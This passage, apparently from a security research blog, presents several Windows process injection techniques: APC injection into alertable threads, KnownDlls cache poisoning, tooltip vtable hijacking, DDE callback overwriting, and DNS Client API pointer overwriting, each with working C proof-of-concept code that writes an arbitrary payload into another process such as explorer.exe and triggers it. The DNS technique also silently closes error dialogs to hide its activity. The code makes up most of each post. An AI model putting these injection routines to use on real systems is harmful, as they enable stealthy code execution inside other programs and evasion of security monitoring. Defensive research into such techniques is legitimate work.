The second step of detection involves reading the register that holds the Alertable parameter. NT system calls use the Microsoft fastcall convention. The first four arguments are placed in RCX, RDX, R8 and R9 with the remainder stored on the stack. Figure 4 shows the Win64 stack layout. The first index of the stack register (Rsp) will contain the return address of caller, the next four will be the shadow, spill or home space to optionally save RCX, RDX, R8 and R9. The fifth, sixth and subsequent arguments to the system call appear after this.

Figure 4. Win64 Stack Layout.

Based on the prototypes shown in the above table, to determine if a thread is alertable, verify the register holding the Alertable parameter is TRUE or FALSE. The following code performs this.

BOOL IsAlertable(HANDLE hp, HANDLE ht, LPVOID addr[6]) {
    CONTEXT   c;
    BOOL      alertable = FALSE;
    DWORD     i;
    ULONG_PTR p[8];
    SIZE_T    rd;
    
    // read the context
    c.ContextFlags = CONTEXT_INTEGER | CONTEXT_CONTROL;
    GetThreadContext(ht, &c);
    
    // for each alertable function
    for(i=0; i<6 && !alertable; i++) {
      // compare address with program counter
      if((LPVOID)c.Rip == addr[i]) {
        switch(i) {
          // ZwDelayExecution
          case 0 : {
            alertable = (c.Rcx & TRUE);
            break;
          }
          // NtWaitForSingleObject
          case 1 : {
            alertable = (c.Rdx & TRUE);
            break;
          }
          // NtWaitForMultipleObjects
          case 2 : {
            alertable = (c.Rsi & TRUE);
            break;
          }
          // NtSignalAndWaitForSingleObject
          case 3 : {
            alertable = (c.Rsi & TRUE);
            break;
          }
          // NtUserMsgWaitForMultipleObjectsEx
          case 4 : {
            ReadProcessMemory(hp, (LPVOID)c.Rsp, p, sizeof(p), &rd);
            alertable = (p[5] & MWMO_ALERTABLE);
            break;
          }
          // NtRemoveIoCompletionEx
          case 5 : {
            ReadProcessMemory(hp, (LPVOID)c.Rsp, p, sizeof(p), &rd);
            alertable = (p[6] & TRUE);
            break;
          }            
        }
      }
    }
    return alertable;
}

You might be asking why Rsi is checked for two of the calls despite not being used for a parameter by the Microsoft fastcall convention. This is a callee saved non-volatile register that should be preserved by any function that uses it. RCX, RDX, R8 and R9 are volatile registers and don’t need to be preserved. It just so happens the kernel overwrites R9 for NtWaitForMultipleObjects (shown in figure 5) and R8 for NtSignalAndWaitForSingleObject (shown in figure 6) hence the reason for checking Rsi instead. BOOLEAN is defined as an 8-bit type, so a mask of the register is performed before comparing with TRUE or FALSE.

Figure 5. Rsi used for Alertable Parameter to NtWaitForMultipleObjects.

Figure 6. Rsi used to for Alertable parameter to NtSignalAndWaitForSingleObject.

The following code can support adding an offset or reading the thread context before enumerating threads.

// thread to run alertable functions
DWORD WINAPI ThreadProc(LPVOID lpParameter) {
    HANDLE           *evt = (HANDLE)lpParameter;
    HANDLE           port;
    OVERLAPPED_ENTRY lap;
    DWORD            n;
    
    SleepEx(INFINITE, TRUE);
    
    WaitForSingleObjectEx(evt[0], INFINITE, TRUE);
    
    WaitForMultipleObjectsEx(2, evt, FALSE, INFINITE, TRUE);
    
    SignalObjectAndWait(evt[1], evt[0], INFINITE, TRUE);
    
    ResetEvent(evt[0]);
    ResetEvent(evt[1]);
    
    MsgWaitForMultipleObjectsEx(2, evt, 
      INFINITE, QS_RAWINPUT, MWMO_ALERTABLE);
      
    port = CreateIoCompletionPort(INVALID_HANDLE_VALUE, NULL, 0, 0);
    GetQueuedCompletionStatusEx(port, &lap, 1, &n, INFINITE, TRUE);
    CloseHandle(port);
    
    return 0;
}

HANDLE find_alertable_thread2(HANDLE hp, DWORD pid) {
    HANDLE        ss, ht, evt[2], h = NULL;
    LPVOID        rm, sevt, f[6];
    THREADENTRY32 te;
    SIZE_T        rd;
    DWORD         i;
    CONTEXT       c;
    ULONG_PTR     p;
    HMODULE       m;
    
    // using the offset requires less code but it may
    // not work across all systems.
#ifdef USE_OFFSET
    char *api[6]={
      "ZwDelayExecution", 
      "ZwWaitForSingleObject",
      "NtWaitForMultipleObjects",
      "NtSignalAndWaitForSingleObject",
      "NtUserMsgWaitForMultipleObjectsEx",
      "NtRemoveIoCompletionEx"};
      
    // 1. Resolve address of alertable functions
    for(i=0; i<6; i++) {
      m = GetModuleHandle(i == 4 ? L"win32u" : L"ntdll");
      f[i] = (LPBYTE)GetProcAddress(m, api[i]) + 0x14;
    }
#else
    // create thread to execute alertable functions
    evt[0] = CreateEvent(NULL, FALSE, FALSE, NULL);
    evt[1] = CreateEvent(NULL, FALSE, FALSE, NULL);
    ht     = CreateThread(NULL, 0, ThreadProc, evt, 0, NULL);
    
    // wait a moment for thread to initialize
    Sleep(100);
    
    // resolve address of SetEvent
    m      = GetModuleHandle(L"kernel32.dll");
    sevt   = GetProcAddress(m, "SetEvent");
    
    // for each alertable function
    for(i=0; i<6; i++) {
      // read the thread context
      c.ContextFlags = CONTEXT_CONTROL;
      GetThreadContext(ht, &c);
      // save address
      f[i] = (LPVOID)c.Rip;
      // queue SetEvent for next function
      QueueUserAPC(sevt, ht, (ULONG_PTR)evt);
    }
    // cleanup thread
    CloseHandle(ht);
    CloseHandle(evt[0]);
    CloseHandle(evt[1]);
#endif

    // Create a snapshot of threads
    ss = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if(ss == INVALID_HANDLE_VALUE) return NULL;
    
    // check each thread
    te.dwSize = sizeof(THREADENTRY32);
    
    if(Thread32First(ss, &te)) {
      do {
        // if not our target process, skip it
        if(te.th32OwnerProcessID != pid) continue;
        
        // if we can't open thread, skip it
        ht = OpenThread(
          THREAD_ALL_ACCESS, 
          FALSE, 
          te.th32ThreadID);
          
        if(ht == NULL) continue;
        
        // found alertable thread?
        if(IsAlertable(hp, ht, f)) {
          // save handle and exit loop
          h = ht;
          break;
        }
        // else close it and continue
        CloseHandle(ht);
      } while(Thread32Next(ss, &te));
    }
    // close snap shot
    CloseHandle(ss);
    return h;
}

Conclusion

Although both methods work fine, the first has some advantages. Different CPU modes/architectures (x86, AMD64, ARM64) and calling conventions (__msfastcall/__stdcall) require different ways to examine parameters. Microsoft may change how the system call wrapper functions work and therefore hardcoded offsets may point to the wrong address. The compiled code in future builds may decide to use another non-volatile register to hold the alertable parameter. e.g RBX, RDI or RBP.

Injection

After the difficult part of detecting alertable threads, the rest is fairly straight forward. The two main functions used for APC injection are:

The second is undocumented and therefore used by some threat actors to bypass API monitoring tools. Since KiUserApcDispatcher is used for APC routines, one might consider invoking it instead. The prototypes are:

NTSTATUS NtQueueApcThread(
  IN  HANDLE ThreadHandle,
  IN  PVOID ApcRoutine,
  IN  PVOID ApcRoutineContext OPTIONAL,
  IN  PVOID ApcStatusBlock OPTIONAL,
  IN  ULONG ApcReserved OPTIONAL);

VOID KiUserApcDispatcher(
  IN  PCONTEXT Context,
  IN  PVOID ApcContext,
  IN  PVOID Argument1,
  IN  PVOID Argument2,
  IN  PKNORMAL_ROUTINE ApcRoutine)

For this post, only QueueUserAPC is used.

VOID apc_inject(DWORD pid, LPVOID payload, DWORD payloadSize) {
    HANDLE hp, ht;
    SIZE_T wr;
    LPVOID cs;
    
    // 1. Open target process
    hp = OpenProcess(
      PROCESS_DUP_HANDLE | 
      PROCESS_VM_READ    | 
      PROCESS_VM_WRITE   | 
      PROCESS_VM_OPERATION, 
      FALSE, pid);
      
    if(hp == NULL) return;
    
    // 2. Find an alertable thread
    ht = find_alertable_thread1(hp, pid);

    if(ht != NULL) {
      // 3. Allocate memory
      cs = VirtualAllocEx(
        hp, 
        NULL, 
        payloadSize, 
        MEM_COMMIT | MEM_RESERVE, 
        PAGE_EXECUTE_READWRITE);
        
      if(cs != NULL) {
        // 4. Write code to memory
        if(WriteProcessMemory(
          hp, 
          cs, 
          payload, 
          payloadSize, 
          &wr)) 
        {
          // 5. Run code
          QueueUserAPC(cs, ht, 0);
        } else {
          printf("unable to write payload to process.\n");
        }
        // 6. Free memory
        VirtualFreeEx(
          hp, 
          cs, 
          0, 
          MEM_DECOMMIT | MEM_RELEASE);
      } else {
        printf("unable to allocate memory.\n");
      }
    } else {
      printf("unable to find alertable thread.\n");
    }
    // 7. Close process
    CloseHandle(hp);
}

PoC here

Posted in assembly, injection, malware, process injection, programming, shellcode, windows | Tagged , , , | Leave a comment

Windows Process Injection: KnownDlls Cache Poisoning

Introduction

This is a quick post in response to a method of injection described by James Forshaw in Bypassing CIG Through KnownDlls. The first example of poisoning the KnownDlls cache on Windows can be sourced back to a security advisory CVE-1999-0376 or MS99-066 published in February 1999. That vulnerability was discovered by Christien Rioux from the hacker group, L0pht. The PoC he released to demonstrate the attack became the basis for other projects involving DLL injection and function hooking. For example, Injection into a Process Using KnownDlls published in 2012 is heavily based on dildog’s original source code. What’s interesting about the injection method described by James is that it doesn’t read or write to virtual memory, something that’s required for almost every method of process injection known. It works by replacing a directory handle in a target process which is then used by the DLL loader to load a malicious DLL. Very clever! 🙂 Other posts related to this topic also worth reading:

If you want a closer look at the Windows Object Manager, WinObj from Microsoft is useful as is NtObjectManager.

Figure 1. KnownDlls in WinObj

Obtaining KnownDlls Directory Object Handle

As James points out, there are at least two ways to do this.

Method 1

The handle is stored in a global variable called ntdll!LdrpKnownDllDirectoryHandle (shown in figure 2) and can be found by searching the .data segment of NTDLL. Once the address is found, one can read the existing handle or overwrite it with a new one.

Figure 2. ntdll!LdrpKnownDllDirectoryHandle

The following code implements this method. The base address is constant for each process and therefore not necessary to read from a remote process.

LPVOID GetKnownDllHandle(DWORD pid) {
    LPVOID                   m, va = NULL;
    PIMAGE_DOS_HEADER        dos;
    PIMAGE_NT_HEADERS        nt;
    PIMAGE_SECTION_HEADER    sh;
    DWORD                    i, cnt;
    PULONG_PTR               ds;
    BYTE                     buf[1024];
    POBJECT_NAME_INFORMATION n = (POBJECT_NAME_INFORMATION)buf;

    // get base of NTDLL and pointer to section header
    m   = GetModuleHandle(L"ntdll.dll");
    dos = (PIMAGE_DOS_HEADER)m;  
    nt  = RVA2VA(PIMAGE_NT_HEADERS, m, dos->e_lfanew);  
    sh  = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader + 
          nt->FileHeader.SizeOfOptionalHeader);
          
    // locate the .data segment, save VA and number of pointers
    for(i=0; i<nt->FileHeader.NumberOfSections; i++) {
      if(*(PDWORD)sh[i].Name == *(PDWORD)".data") {
        ds  = RVA2VA(PULONG_PTR, m, sh[i].VirtualAddress);
        cnt = sh[i].Misc.VirtualSize / sizeof(ULONG_PTR);
        break;
      }
    }
    // for each pointer
    for(i=0; i<cnt; i++) {
      if((LPVOID)ds[i] == NULL) continue;
      // query the object name
      NtQueryObject((LPVOID)ds[i], 
        ObjectNameInformation, n, MAX_PATH, NULL);
            
      // string returned?
      if(n->Name.Length != 0) {
        // does it match ours?
        if(!lstrcmp(n->Name.Buffer, L"\\KnownDlls")) {
          // return virtual address
          va = &ds[i];
          break;
        }
      }
    }
    return va;
}

Method 2

The SystemHandleInformation class passed to NtQuerySystemInformation will return a list of all handles open on the system. To target a speicific process, we compare the UniqueProcessId from each SYSTEM_HANDLE_TABLE_ENTRY_INFO structure with the target PID. The HandleValue is duplicated and the name is queried. This name is then compared with “\KnownDlls” and if a match is found, HandleValue is returned to the caller.

HANDLE GetKnownDllHandle2(DWORD pid, HANDLE hp) {
    ULONG                      len;
    NTSTATUS                   nts;
    LPVOID                     list=NULL;    
    DWORD                      i;
    HANDLE                     obj, h = NULL;
    PSYSTEM_HANDLE_INFORMATION hl;
    BYTE                       buf[1024];
    POBJECT_NAME_INFORMATION   name = (POBJECT_NAME_INFORMATION)buf;
    
    // read the full list of system handles
    for(len = 8192; ;len += 8192) {
      list = malloc(len);
      
      nts = NtQuerySystemInformation(
          SystemHandleInformation, list, len, NULL);
      
      // break from loop if ok    
      if(NT_SUCCESS(nts)) break;
      
      // free list and continue
      free(list);
    }
    
    hl = (PSYSTEM_HANDLE_INFORMATION)list;

    // for each handle
    for(i=0; i<hl->NumberOfHandles && h == NULL; i++) {
      // skip these to avoid hanging process
      if((hl->Handles[i].GrantedAccess == 0x0012019f) || 
         (hl->Handles[i].GrantedAccess == 0x001a019f) || 
         (hl->Handles[i].GrantedAccess == 0x00120189) || 
         (hl->Handles[i].GrantedAccess == 0x00100000)) {
        continue;
      }

      // skip if this handle not in our target process
      if(hl->Handles[i].UniqueProcessId != pid) {
        continue;
      }
      
      // duplicate the handle object
      nts = NtDuplicateObject(
            hp, (HANDLE)hl->Handles[i].HandleValue, 
            GetCurrentProcess(), &obj, 0, FALSE, 
            DUPLICATE_SAME_ACCESS);
        
      if(NT_SUCCESS(nts)) {
        // query the name
        NtQueryObject(
          obj, ObjectNameInformation, 
          name, MAX_PATH, NULL);
          
        // if name returned.. 
        if(name->Name.Length != 0) {
          // is it knowndlls directory?
          if(!lstrcmp(name->Name.Buffer, L"\\KnownDlls")) {
            h = (HANDLE)hl->Handles[i].HandleValue;
          }
        }
        NtClose(obj);
      }
    }
    free(list);
    return h;
}

Injection

The following code is purely based on the steps described in the article and in its current state will cause a target process to stop working properly. That’s why the PoC creates a process (notepad) before attempting injection rather than allowing selection of a process.

VOID knowndll_inject(DWORD pid, PWCHAR fake_dll, PWCHAR target_dll) {
    NTSTATUS          nts;
    DWORD             i;
    HANDLE            hp, hs, hf, dir, target_handle;
    OBJECT_ATTRIBUTES fa, da, sa;
    UNICODE_STRING    fn, dn, sn, ntpath;
    IO_STATUS_BLOCK   iosb;

    // open process for duplicating handle, suspending/resuming process
    hp = OpenProcess(PROCESS_DUP_HANDLE | PROCESS_SUSPEND_RESUME, FALSE, pid);
    
    // 1. Get the KnownDlls directory object handle from remote process
    target_handle = GetKnownDllHandle2(pid, hp);

    // 2. Create empty object directory, insert named section of DLL to hijack
    //    using file handle of DLL to inject    
    InitializeObjectAttributes(&da, NULL, 0, NULL, NULL);
    nts = NtCreateDirectoryObject(&dir, DIRECTORY_ALL_ACCESS, &da);
    
    // 2.1 open the fake DLL
    RtlDosPathNameToNtPathName_U(fake_dll, &fn, NULL, NULL);
    InitializeObjectAttributes(&fa, &fn, OBJ_CASE_INSENSITIVE, NULL, NULL);
      
    nts = NtOpenFile(
      &hf, FILE_GENERIC_READ | FILE_GENERIC_WRITE | FILE_GENERIC_EXECUTE,
      &fa, &iosb, FILE_SHARE_READ | FILE_SHARE_WRITE, 0);
    
    // 2.2 create named section of target DLL using fake DLL image
    RtlInitUnicodeString(&sn, target_dll);
    InitializeObjectAttributes(&sa, &sn, OBJ_CASE_INSENSITIVE, dir, NULL);
        
    nts = NtCreateSection(
      &hs, SECTION_ALL_ACCESS, &sa, 
      NULL, PAGE_EXECUTE, SEC_IMAGE, hf);
            
    // 3. Close the known DLLs handle in remote process
    NtSuspendProcess(hp);
    
    DuplicateHandle(hp, target_handle, 
      GetCurrentProcess(), NULL, 0, TRUE, DUPLICATE_CLOSE_SOURCE);
                    
    // 4. Duplicate object directory for remote process
    DuplicateHandle(
        GetCurrentProcess(), dir, hp, 
        NULL, 0, TRUE, DUPLICATE_SAME_ACCESS);
        
    NtResumeProcess(hp);
    CloseHandle(hp);
    
    printf("Select File->Open to load \"%ws\" into notepad.\n", fake_dll);
    printf("Press any key to continue...\n");
    getchar();
}

Demo

Figure 3 shows a message box displayed after the hijacked DLL (ole32.dll) is loaded.

Figure 3. Injection in notepad.

PoC here.

Posted in injection, programming, windows | Tagged , , , | Leave a comment

Windows Process Injection: Tooltip or Common Controls

Introduction

Tooltips appear automatically to a mouse pointer hovering over an element in a user interface. This helps users identify the purpose of a file, a button or menu item. These tooltips store data about itself in a structure located at index zero of the Window Bytes. The first entry in the structure is a pointer to a class object called CToolTipsMgr. There are at least five methods here, three for the IUnknown interface which CToolTipsMgr inherits from and two to control the tooltip object itself. By changing the address of a method/function pointer, it’s possible to perform process injection via a window message.

Locating Controls

Figure 1 shows the properties of a tooltip control window.

Figure 1. Window properties for tooltip class.

As you can see, index zero of the window bytes are set to a value. This is a heap object that contains among other things, a pointer to a class object or virtual function table at offset zero. Figure 2 shows a partial dump of the memory in Windows Debugger while figure 3 shows the methods of the class used to control the window.

Figure 2. Heap object for window.

Figure 3. Methods of tool tip control window.

The PoC doesn’t target any specific process, but since explorer.exe will likely be the first to create a Tooltip control, it’s relatively safe to assume a window belonging to that process will be returned by a call to the FindWindow API for classes named “tooltips_class32”. You could also use the EnumWindows API to find them all and target a specific process. Figure 4 shows a list of these classes found on a 64-bit version of Windows 10.

Figure 4. List of tooltip windows found via EnumWindows.

Injection

The following code demonstrates the injection works. The full version can be found here.

VOID comctrl_inject(LPVOID payload, DWORD payloadSize) {
    HWND         hw = 0;
    SIZE_T       rd, wr;
    LPVOID       ds, cs, p, ptr;
    HANDLE       hp;
    DWORD        pid;
    IUnknown_VFT unk;
    
    // 1. find a tool tip window.
    //    read index zero of window bytes
    hw = FindWindow(L"tooltips_class32", NULL);
    p  = (LPVOID)GetWindowLongPtr(hw, 0);
    GetWindowThreadProcessId(hw, &pid);
    
    // 2. open the process and read CToolTipsMgr
    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if(hp == NULL) return;
    ReadProcessMemory(hp, p, &ptr, sizeof(ULONG_PTR), &rd);
    ReadProcessMemory(hp, ptr, &unk, sizeof(unk), &rd);
    
    //printf("HWND : %p Heap : %p PID : %i vftable : %p\n", 
      // hw, p, pid, ptr);
    
    // 3. allocate RWX memory and write payload there.
    //    update callback
    cs = VirtualAllocEx(hp, NULL, payloadSize, 
      MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hp, cs, payload, payloadSize, &wr);
    
    // 4. allocate RW memory and write new CToolTipsMgr
    unk.AddRef = cs;
    ds = VirtualAllocEx(hp, NULL, sizeof(unk),
      MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    WriteProcessMemory(hp, ds, &unk, sizeof(unk), &wr);
    
    // 5. update pointer, trigger execution
    WriteProcessMemory(hp, p, &ds, sizeof(ULONG_PTR), &wr);
    PostMessage(hw, WM_USER, 0, 0);

    // sleep for moment
    Sleep(1);
    
    // 6. restore original pointer and cleanup
    WriteProcessMemory(hp, p, &ptr, sizeof(ULONG_PTR), &wr);    
    VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
    VirtualFreeEx(hp, ds, 0, MEM_DECOMMIT | MEM_RELEASE);
    CloseHandle(hp);
}

Summary

The PoC only works with Tooltip class, but there are other controls that can also be used for process injection. Tab controls, progress bars, status bars, tree views, toolbars, list views are just some other examples. The reason tooltips were used in this post is because many of them are already created by explorer.exe.

Posted in injection, process injection, programming, security, windows | Tagged , , | Leave a comment

Windows Process Injection: Breaking BaDDEr

Introduction

Dynamic Data Exchange (DDE) is a data sharing protocol while the Dynamic Data Exchange Management Library (DDEML) facilitates sharing of data among applications over the DDE protocol. DDE made the headlines in October 2017 after a vulnerability was discovered in Microsoft Office that could be exploited to execute code. Since then, it’s been disabled by default and is therefore not considered a critical component. The scope of this injection method is limited to explorer.exe, unless of course you know of other applications that use it. I’d like to thank Adam for the discussion about using DDE for injection and also the cheesy name. 😀

Enumerating DDE Servers

The only DLL that use DDE servers on Windows 10 are shell32.dll, ieframe.dll and twain_32.dll. shell32.dll creates three DDE servers that are hosted by explorer.exe. The following code uses DDEML API to list servers and the process hosting them.

VOID dde_list(VOID) {
    CONVCONTEXT cc;
    HCONVLIST   cl;
    DWORD       idInst = 0;
    HCONV       c = NULL;
    CONVINFO    ci;
    WCHAR       server[MAX_PATH];
    
    if(DMLERR_NO_ERROR != DdeInitialize(&idInst, NULL, APPCLASS_STANDARD, 0)) {
      printf("unable to initialize : %i.\n", GetLastError());
      return;
    }
    
    ZeroMemory(&cc, sizeof(cc));
    cc.cb = sizeof(cc);
    cl = DdeConnectList(idInst, 0, 0, 0, &cc);
    
    if(cl != NULL) {
      for(;;) {
        c = DdeQueryNextServer(cl, c);
        if(c == NULL) break;
        ci.cb = sizeof(ci);
        DdeQueryConvInfo(c, QID_SYNC, &ci);
        DdeQueryString(idInst, ci.hszSvcPartner, server, MAX_PATH, CP_WINUNICODE);
        
        printf("Service : %-10ws Process : %ws\n", 
          server, wnd2proc(ci.hwndPartner));
      }
      DdeDisconnectList(cl);
    } else {
      printf("DdeConnectList : %x\n", DdeGetLastError(idInst));
    }
    DdeUninitialize(idInst);
}

DDE Internals

Figure 1 shows the decompiled code where the servers are created.

Figure 1. DDE initialization in shell32.dll

user32!DdeInitializeW is where all the interesting stuff occurs. user32!InternalDdeInitialize will allocate memory on the heap for a structure called CL_INSTANCE_INFO which isn’t documented in the public SDK, but you can still find it online.

typedef struct tagCL_INSTANCE_INFO {
    struct tagCL_INSTANCE_INFO *next;
    HANDLE                      hInstServer;
    HANDLE                      hInstClient;
    DWORD                       MonitorFlags;
    HWND                        hwndMother;
    HWND                        hwndEvent;
    HWND                        hwndTimeout;
    DWORD                       afCmd;
    PFNCALLBACK                 pfnCallback;
    DWORD                       LastError;
    DWORD                       tid;
    LATOM                      *plaNameService;
    WORD                        cNameServiceAlloc;
    PSERVER_LOOKUP              aServerLookup;
    short                       cServerLookupAlloc;
    WORD                        ConvStartupState;
    WORD                        flags;              // IIF_ flags
    short                       cInDDEMLCallback;
    PLINK_COUNT                 pLinkCount;
} CL_INSTANCE_INFO, *PCL_INSTANCE_INFO;

The only field we’re interested in is pfnCallback. The steps to inject are:

  1. Find the DDE mother window by its registered class name “DDEMLMom”.
  2. Read the address of CL_INSTANCE_INFO using GetWindowLongPtr.
  3. Allocate RWX memory in remote process and write payload there.
  4. Overwrite the function pointer pfncallback with the remote address of payload.
  5. Trigger execution over DDE.

Figure 2 shows the properties of the mother window. As you can see, index zero of the Window Bytes is set. This is the address of CL_INSTANCE_INFO.

Figure 2. Mother Window for DDE server.

Injection

The following is a PoC to demonstrate the method works. Full source can be found here.

VOID dde_inject(LPVOID payload, DWORD payloadSize) {
    HWND             hw;
    SIZE_T           rd, wr;
    LPVOID           ptr, cs;
    HANDLE           hp;
    CL_INSTANCE_INFO pcii;
    CONVCONTEXT      cc;
    HCONVLIST        cl;
    DWORD            pid, idInst = 0;
    
    // 1. find a DDEML window and read the address 
    //    of CL_INSTANCE_INFO
    hw = FindWindowEx(NULL, NULL, L"DDEMLMom", NULL);
    if(hw == NULL) return;
    ptr = (LPVOID)GetWindowLongPtr(hw, GWLP_INSTANCE_INFO);
    if(ptr == NULL) return;
      
    // 2. open the process and read CL_INSTANCE_INFO
    GetWindowThreadProcessId(hw, &pid);
    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if(hp == NULL) return;
    ReadProcessMemory(hp, ptr, &pcii, sizeof(pcii), &rd);
    
    // 3. allocate RWX memory and write payload there.
    //    update callback
    cs = VirtualAllocEx(hp, NULL, payloadSize, 
      MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hp, cs, payload, payloadSize, &wr);
    WriteProcessMemory(
      hp, (PBYTE)ptr + offsetof(CL_INSTANCE_INFO, pfnCallback), 
      &cs, sizeof(ULONG_PTR), &wr);
            
    // 4. trigger execution via DDE protocol
    DdeInitialize(&idInst, NULL, APPCLASS_STANDARD, 0);
    ZeroMemory(&cc, sizeof(cc));
    cc.cb = sizeof(cc);
    cl = DdeConnectList(idInst, 0, 0, 0, &cc);
    DdeDisconnectList(cl);
    DdeUninitialize(idInst);
    
    // 5. restore original pointer and cleanup
    WriteProcessMemory(
      hp, 
      (PBYTE)ptr + offsetof(CL_INSTANCE_INFO, pfnCallback), 
      &pcii.pfnCallback, sizeof(ULONG_PTR), &wr);
          
    VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
    CloseHandle(hp);
}
Posted in injection, malware, process injection, programming, windows | Tagged , , , , | Leave a comment

Windows Process Injection: DNS Client API

Introduction

This is a quick response to Code Execution via surgical callback overwrites by Adam. He suggests overwriting DNS memory functions to facilitate process injection. This post will demonstrate how the injection works with explorer.exe. It was only tested on a 64-bit version of Windows 10, so your experience may be different from mine. Nevertheless, the method does work.

DNS Client API DLL

When first loaded into a process, dnsapi!Heap_Initialize will assign the address of functions in the .text segment to variables in the .data segment. Figure 1 shows disassembly of this while figure 2 shows the function pointers.

Figure 1. dnsapi!Heap_Initialize

Figure 2. Function pointers for dnsapi.dll

pDnsAllocFunction is assigned dnsapi!Dns_HeapAlloc while pDnsFreeFunction is assigned dnsapi!Dns_HeapFree. Every time a DnsQuery API is called, both of these functions are executed via the pointers.

DNS Caching Resolver Service

This runs from inside dnsrslvr.dll and is loaded by a service host (svchost.exe) process. dnsrslvr!ResolverInitialize will assign the address of functions in the .text segment to variables in the .data segment. Figure 3. shows disassembly of this while figure 4 shows the function pointers.

Figure 3. dnsrslvr!ResolverInitialize

Figure 4. Function pointers for dnsrslvr.dll

pDnsAllocFunction is assigned dnsapi!DnsApiAlloc while pDnsFreeFunction is assigned dnsapi!DnsApiFree.

Finding Pointers

Load dnsapi.dll into local process, obtain the virtual address of the .data segment. Find two pointers with addresses inside the .text segment. Once found, subtract the base address of dnsapi.dll to obtain the relative virtual address (RVA). Then add the base address of dnsapi.dll in remote process. The following code from the PoC illustrates this.

LPVOID GetDnsApiAddr(DWORD pid) {
    LPVOID                m, rm, va = NULL;
    PIMAGE_DOS_HEADER     dos;
    PIMAGE_NT_HEADERS     nt;
    PIMAGE_SECTION_HEADER sh;
    DWORD                 i, cnt, rva=0;
    PULONG_PTR            ds;
    
    // does remote have dnsapi loaded?
    rm  = GetRemoteModuleHandle(pid, L"dnsapi.dll");
    if(rm == NULL) return NULL;
    
    // load local copy
    m   = LoadLibrary(L"dnsapi.dll");
    dos = (PIMAGE_DOS_HEADER)m;  
    nt  = RVA2VA(PIMAGE_NT_HEADERS, m, dos->e_lfanew);  
    sh  = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader + 
          nt->FileHeader.SizeOfOptionalHeader);
          
    // locate the .data segment, save VA and number of pointers
    for(i=0; i<nt->FileHeader.NumberOfSections; i++) {
      if(*(PDWORD)sh[i].Name == *(PDWORD)".data") {
        ds  = RVA2VA(PULONG_PTR, m, sh[i].VirtualAddress);
        cnt = sh[i].Misc.VirtualSize / sizeof(ULONG_PTR);
        break;
      }
    }
    // for each pointer
    for(i=0; i<cnt - 1; i++) {
      // if two pointers side by side are not to code, skip it
      if(!IsCodePtr((LPVOID)ds[i  ])) continue;
      if(!IsCodePtr((LPVOID)ds[i+1])) continue;
      // calculate VA in remote process
      va = ((PBYTE)&ds[i] - (PBYTE)m) + (PBYTE)rm;
      break;
    }
    return va;
}

Injection

Overwriting either of the function pointers and invoking the DNS API to resolve a hostname allows us to control the flow of execution inside a remote process. Unless the DNS_QUERY_BYPASS_CACHE option is specified by a DNS API client, the DNS cache service may be used to resolve a hostname and that’s where it’s possible to control flow inside the service.

Executing In Explorer

Is the easiest way to demonstrate this method of injection because we can easily force it to resolve hostnames via the IShellWindows interface. Microsoft already provide an example of how to do this in sample code.

Network Dialogs

Since we’re deliberately using a fake UNC path to force invocation of the DNS Client API, explorer will display errors similar to what’s shown in figure 5.

Figure 5. Pesky Network Error

To hide these, a thread is created with an endless loop to find and automatically close them. It’s a bit crude and there may be a more elegant way of closing these, but it works for the PoC.


// for any "Network Error", close the window
VOID SuppressErrors(LPVOID lpParameter) {
    HWND hw;
    
    for(;;) {
      hw = FindWindowEx(NULL, NULL, NULL, L"Network Error");
      if(hw != NULL) {
        PostMessage(hw, WM_CLOSE, 0, 0);
      }
    }
}

Proof of Concept

To demonstrate the method of injection works, the following code outlines each step. For more details, view the full source here.

VOID dns_inject(LPVOID payload, DWORD payloadSize) {
    LPVOID dns, cs, ptr;
    DWORD  pid, cnt, tick, i, t;
    HANDLE hp, ht;
    SIZE_T wr;
    HWND   hw;
    WCHAR  unc[32]={L'\\', L'\\'}; // UNC path to invoke DNS api

    // 1. obtain process id for explorer
    //    and try read address of function pointers
    GetWindowThreadProcessId(GetShellWindow(), &pid); 
    ptr = GetDnsApiAddr(pid);
    
    // 2. create a thread to suppress network errors displayed
    ht = CreateThread(NULL, 0, 
      (LPTHREAD_START_ROUTINE)SuppressErrors, NULL, 0, NULL);
      
    // 3. if dns api not already loaded, try force 
    // explorer to load via fake UNC path
    if(ptr == NULL) {
      tick = GetTickCount();
      for(i=0; i<8; i++) {
        unc[2+i] = (tick % 26) + 'a';
        tick >>= 2;
      }
      ShellExecInExplorer(unc);
      ptr = GetDnsApiAddr(pid);
    }
    
    if(ptr != NULL) {
      // 4. open explorer, backup address of dns function.
      //    allocate RWX memory and write payload
      hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
      ReadProcessMemory(hp, ptr, &dns, sizeof(ULONG_PTR), &wr);
      cs = VirtualAllocEx(hp, NULL, payloadSize, 
        MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
      WriteProcessMemory(hp, cs, payload, payloadSize, &wr);
      
      // 5. overwrite pointer to dns function
      //    generate fake UNC path and trigger execution
      WriteProcessMemory(hp, ptr, &cs, sizeof(ULONG_PTR), &wr);
      tick = GetTickCount();
      for(i=0; i<8; i++) {
        unc[2+i] = (tick % 26) + L'a';
        tick >>= 2;
      }
      ShellExecInExplorer(unc);
      
      // 6. restore dns function, release memory and close process
      WriteProcessMemory(hp, ptr, &dns, sizeof(ULONG_PTR), &wr);
      VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
      CloseHandle(hp);
    }
    // 7. terminate thread
    TerminateThread(ht, 0);
}

Summary

Processes have thousands of function pointers which are executed in response to I/O from the system or a user interface. Automating a way to monitor access to these function pointers while simultaneously sending I/O from an external process would no doubt uncover many more methods similar to the method discussed here. Source PoC.

Posted in assembly, injection, malware, process injection, programming, security, windows | Tagged , , , , | Leave a comment